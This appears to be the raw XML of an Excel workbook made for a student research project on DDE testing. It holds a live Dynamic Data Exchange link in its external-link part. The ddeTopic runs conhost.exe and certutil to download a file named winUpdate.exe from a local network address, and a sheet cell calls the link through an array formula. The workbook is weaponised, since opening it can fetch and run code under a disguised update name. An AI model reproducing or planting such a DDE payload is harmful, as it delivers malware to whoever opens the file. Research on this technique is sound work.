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eeb\Documents\Northumbria University\MComp\Research Project\dde testing\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{5038323E-80B1-4E67-8E08-19DF857B8AFF}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-28920" yWindow="30" windowWidth="29040" windowHeight="15840" xr2:uid="{01332888-D730-4443-A551-DDA8E137ED52}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="4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4" l="1" a="1"/>
  <c r="A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onhost" ddeTopic="\..\..\..\..\Windows\System32\conhost.exe certutil -f -split -urlcache http://192.168.0.17/winUpdate.exe ">
    <ddeItems>
      <ddeItem name=" A1" advise="1"/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23D45-5BFF-4414-86CB-05C224D12BAD}">
  <dimension ref="A1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e" cm="1">
        <f t="array" ref="A1">[1]!' A1'</f>
        <v>#REF!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2D16BE-165F-4B4A-92C7-9D69950823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Aqeeb Hussain</dc:creator>
  <cp:lastModifiedBy>Aqeeb Hussain</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-03T19:46:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-24T20:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>